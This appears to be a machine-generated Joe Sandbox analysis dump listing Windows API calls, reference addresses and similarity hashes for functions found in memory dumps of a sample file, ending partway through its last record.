• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: 44952e5915b1f0a32c233a316f6c3cac84b786ed5bef269f89a7add1ff923e9d
• Instruction ID: e9af312a18da704a5a99a12a63ce94b10015b369662a0a46072e6bfb84be4431
• Opcode Fuzzy Hash: 44952e5915b1f0a32c233a316f6c3cac84b786ed5bef269f89a7add1ff923e9d
• Instruction Fuzzy Hash: 8DB17975600225EFDF16CF69C9867BD7BB5BF04701F09806AEC489B295D734A950CBA0
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000), ref: 00312ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00312B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000), ref: 0034C21A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000), ref: 0034C286
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 634a34c3f335a524921f86c6f72b51561ca75dfdfad9a7ec9d95b90a84958173
• Instruction ID: aafe70d556036b8cddc5e9a48675effc7f3d9bd2d29ddd0a9f1d9cf8dbd6cc58
• Opcode Fuzzy Hash: 634a34c3f335a524921f86c6f72b51561ca75dfdfad9a7ec9d95b90a84958173
• Instruction Fuzzy Hash: DE41FE316197809ECB7F57289C88BEB7BD9AF4D310F158819E04786560CAB1A8F1D720
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 003770DD
  • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
  • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00377114
• EnterCriticalSection.KERNEL32(?), ref: 00377130
• _memmove.LIBCMT ref: 0037717E
• _memmove.LIBCMT ref: 0037719B
• LeaveCriticalSection.KERNEL32(?), ref: 003771AA
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003771BF
• InterlockedExchange.KERNEL32(?,000001F6), ref: 003771DE
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: 7717e23e3a6dd7030a0a819c67093227e937d31ca9f26588b52d3985628dc0b7
• Instruction ID: ca74755523d0342acea2f331924602ddf6eec0d4a7ba12630d9f53009dc163c0
• Opcode Fuzzy Hash: 7717e23e3a6dd7030a0a819c67093227e937d31ca9f26588b52d3985628dc0b7
• Instruction Fuzzy Hash: 22317235A00205EFCF15EFA4DC85AAEB7B8EF45310F1541A6E904DB256D735AE10CBA0
APIs
• DeleteObject.GDI32(00000000), ref: 003961EB
• GetDC.USER32(00000000), ref: 003961F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 003961FE
• ReleaseDC.USER32(00000000,00000000), ref: 0039620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00396246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00396257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0039902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00396291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003962B1
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 825ff51ec85697cbe0de2f304fda54ab0a5501dc3d45b2221b50b5d1cc6b494c
• Instruction ID: 619c0dfa86d9f59efc87a2635a6085b53356cc1eb20035b66200cf7672d603ab
• Opcode Fuzzy Hash: 825ff51ec85697cbe0de2f304fda54ab0a5501dc3d45b2221b50b5d1cc6b494c
• Instruction Fuzzy Hash: 84316D72201210BFEF128F50CC8AFEA3BADEF49765F054066FE48DA291C6769C51CB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: c4149c017ed22c99daaf0639a7e33926d80b9c8ff9d5b49f7e8dda45d7d519d1
• Instruction ID: 2c8487c0af1fe8e98aff8ea4715e24274a4a4d94120f033cf797c84d8b243750
• Opcode Fuzzy Hash: c4149c017ed22c99daaf0639a7e33926d80b9c8ff9d5b49f7e8dda45d7d519d1
• Instruction Fuzzy Hash: EF21F3616012057BE2177616AD82FFBF36CEE11398F088020FD04DB64BEBA5DF518AA1
APIs
  • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
  • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
  • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
• _wcstok.LIBCMT ref: 0037EC94
• _wcscpy.LIBCMT ref: 0037ED23
• _memset.LIBCMT ref: 0037ED56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 6dcba4d9c1951bed1d1f13ea3cd9750266f002eeb29dc666231e9862619ff025
• Instruction ID: 871730526c3ba3de7acc749c77f1b6d4bd2eb4d86acee54f9b1524ec31aae76d
• Opcode Fuzzy Hash: 6dcba4d9c1951bed1d1f13ea3cd9750266f002eeb29dc666231e9862619ff025
• Instruction Fuzzy Hash: 8CC181715083019FC72AEF24C491A9AB7E4FF8D310F04896DF8999B2A1DB70ED45CB82
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bbd609c28c1b8cfb627118480aaf9432868495c5a0519b37c99b9060dd1b935e
                                                                          • Instruction ID: 8a14e147d05f94f58118596c6c2eb5071e925f67948c6f3592f1a7107ebcdb5e
                                                                          • Opcode Fuzzy Hash: bbd609c28c1b8cfb627118480aaf9432868495c5a0519b37c99b9060dd1b935e
                                                                          • Instruction Fuzzy Hash: DB717F30900109EFCB0ACF59CC45AFEBB79FF89310F158159FA15AA251C734AA91CFA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aea2a942848f285d049b63ffa32c383241cd175a6ee9bbbadd146f1310b3c3f3
                                                                          • Instruction ID: 0ac6ce74c9db6018a7e615c861098dea4594f1782b28c3074070e236ec19e2a0
                                                                          • Opcode Fuzzy Hash: aea2a942848f285d049b63ffa32c383241cd175a6ee9bbbadd146f1310b3c3f3
                                                                          • Instruction Fuzzy Hash: 1261BF72208300ABC716FB24CC92FABB7E8AF88714F10491DF9469B292DB70ED45C752
                                                                          APIs
                                                                          • IsWindow.USER32(01146948), ref: 0039B3EB
                                                                          • IsWindowEnabled.USER32(01146948), ref: 0039B3F7
                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0039B4DB
                                                                          • SendMessageW.USER32(01146948,000000B0,?,?), ref: 0039B512
                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 0039B54F
                                                                          • GetWindowLongW.USER32(01146948,000000EC), ref: 0039B571
                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0039B589
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                          • String ID:
                                                                          • API String ID: 4072528602-0
                                                                          • Opcode ID: cce6e4edd21a73fcb457a2d7ff7ed201a933d8b73c76f883571ebc1e03446d6b
                                                                          • Instruction ID: c641a8a03eb7325d814268e3fa011334940e38284dbdfbf7e25dba70c2695716
                                                                          • Opcode Fuzzy Hash: cce6e4edd21a73fcb457a2d7ff7ed201a933d8b73c76f883571ebc1e03446d6b
                                                                          • Instruction Fuzzy Hash: FF71AE38605205EFDF239F65E9D4FBABBB9EF09300F15405AE941973A2C732A950EB50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0038F448
                                                                          • _memset.LIBCMT ref: 0038F511
                                                                          • ShellExecuteExW.SHELL32(?), ref: 0038F556
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                            • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
                                                                          • GetProcessId.KERNEL32(00000000), ref: 0038F5CD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0038F5FC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                          • String ID: @
                                                                          • API String ID: 3522835683-2766056989
                                                                          • Opcode ID: b44b29afa185c1ca3ee13da5de7dc31fcf78ad32698d0e9762e4d80ee0e6bb5d
                                                                          • Instruction ID: 878d42bfc252d54b884ea3ac309f46ad60adedc0b00ed1818fd54abca9fc024a
                                                                          • Opcode Fuzzy Hash: b44b29afa185c1ca3ee13da5de7dc31fcf78ad32698d0e9762e4d80ee0e6bb5d
                                                                          • Instruction Fuzzy Hash: E4619075A00619DFCB16EF64C4919AEB7F5FF4D310F1580AAE859AB351CB30AD41CB90
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00370F8C
                                                                          • GetKeyboardState.USER32(?), ref: 00370FA1
                                                                          • SetKeyboardState.USER32(?), ref: 00371002
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00371030
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0037104F
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00371095
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003710B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: adab27fe63ba604e206d5a7b6b329e4f2949fa5afc18ab8363c94db0b7a40a90
                                                                          • Instruction ID: 9b30a1429fc29a2d67fb47e1a9ca7b8e452376374fa4abb3a0fc88a3eb8ce300
                                                                          • Opcode Fuzzy Hash: adab27fe63ba604e206d5a7b6b329e4f2949fa5afc18ab8363c94db0b7a40a90
                                                                          • Instruction Fuzzy Hash: 9A51D2A15047D57DFB3746388C05BBABEE95B06304F09C589E1DC898D3C2ADACD4D751
                                                                          APIs
                                                                          • GetParent.USER32(00000000), ref: 00370DA5
                                                                          • GetKeyboardState.USER32(?), ref: 00370DBA
                                                                          • SetKeyboardState.USER32(?), ref: 00370E1B
                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00370E47
                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00370E64
                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00370EA8
                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00370EC9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 8b214edca3976c296b0948cd489edb9f5b8403d68a55b5b62b772e243dc73671
                                                                          • Instruction ID: f6acbc676bf81de08e5dd1fbfef419f96e2dabee9fbf763ed27a9635375e0c57
                                                                          • Opcode Fuzzy Hash: 8b214edca3976c296b0948cd489edb9f5b8403d68a55b5b62b772e243dc73671
                                                                          • Instruction Fuzzy Hash: 9F51F6A1504BD5BDFB3B87748C45B7ABEA95B06300F08C889F1DC9A8C3D399AC98D750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$LocalTime
                                                                          • String ID:
                                                                          • API String ID: 2945705084-0
                                                                          • Opcode ID: dc771435231f2076a2fc4122fb1df9a3fa1bfb59829dff9ba3b1d358d29cc2bd
                                                                          • Instruction ID: 4a9193e3cd73cb87257d7bc4b8c83400f6eaf5f18ad579e7ef8c2bae9c1a9922
                                                                          • Opcode Fuzzy Hash: dc771435231f2076a2fc4122fb1df9a3fa1bfb59829dff9ba3b1d358d29cc2bd
                                                                          • Instruction Fuzzy Hash: 8A419275D1061876CB17EBF48C869CFB3B89F05310F508966E518E7221EB34E255C7AA
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0036D5D4
                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0036D60A
                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0036D61B
                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0036D69D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                          • String ID: ,,:$DllGetClassObject
                                                                          • API String ID: 753597075-3217529581
                                                                          • Opcode ID: fd563352644c272266268b8d2e6cbad6a568caeca0d1df7f7a0411a82290dbd4
                                                                          • Instruction ID: fb017d981e4cedf8136f472328e7f6b52c0c703654a735002d01507d53e8f5a2
                                                                          • Opcode Fuzzy Hash: fd563352644c272266268b8d2e6cbad6a568caeca0d1df7f7a0411a82290dbd4
                                                                          • Instruction Fuzzy Hash: E4415FB1B00205EFDB16DF64C884A9ABBA9EF44310F55C1A9ED0ADF209D7B1DD44CBA0
                                                                          APIs
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00373697,?), ref: 0037468B
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00373697,?), ref: 003746A4
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003736B7
                                                                          • _wcscmp.LIBCMT ref: 003736D3
                                                                          • MoveFileW.KERNEL32(?,?), ref: 003736EB
                                                                          • _wcscat.LIBCMT ref: 00373733
                                                                          • SHFileOperationW.SHELL32(?), ref: 0037379F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 1377345388-1173974218
                                                                          • Opcode ID: a0894604a3779891c73a50215c2ed0d053794ca8782c33d3cd5780d61aa740c5
                                                                          • Instruction ID: 525c55a849b795db4fec242483ad7ae72e9d674cf15c7260f80f9fe892091d77
                                                                          • Opcode Fuzzy Hash: a0894604a3779891c73a50215c2ed0d053794ca8782c33d3cd5780d61aa740c5
                                                                          • Instruction Fuzzy Hash: 0F416D71508345AEC767EF64C481ADFB7ECAF89380F00492EB49AC7251EB39D6898752
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003972AA
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397351
                                                                          • IsMenu.USER32(?), ref: 00397369
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003973B1
                                                                          • DrawMenuBar.USER32 ref: 003973C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                          • String ID: 0
                                                                          • API String ID: 3866635326-4108050209
                                                                          • Opcode ID: 9f859637af809b7f76c89e1af16fcac7be1aaa4a26786ba4ae3ed2e24b868527
                                                                          • Instruction ID: 7c3a14b6ec68e05f7df2cc6cb280065643bed96c0ef110bb6e4da7b5cc50155b
                                                                          • Opcode Fuzzy Hash: 9f859637af809b7f76c89e1af16fcac7be1aaa4a26786ba4ae3ed2e24b868527
                                                                          • Instruction Fuzzy Hash: C9413779A14209EFDF22DF50D884A9ABBF8FB09310F15842AFD159B290D731AD50EF90
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00390FD4
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00390FFE
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 003910B5
                                                                            • Part of subcall function 00390FA5: RegCloseKey.ADVAPI32(?), ref: 0039101B
                                                                            • Part of subcall function 00390FA5: FreeLibrary.KERNEL32(?), ref: 0039106D
                                                                            • Part of subcall function 00390FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00391090
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00391058
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: 88132146206fedec159393e4f4b260bcb183f11f966962e4526fbc53a5a98f0b
                                                                          • Instruction ID: 8957fc1e40263ca0e9ecc85e92d3957c1b34a99a6899dd68beaa0c8efef8180f
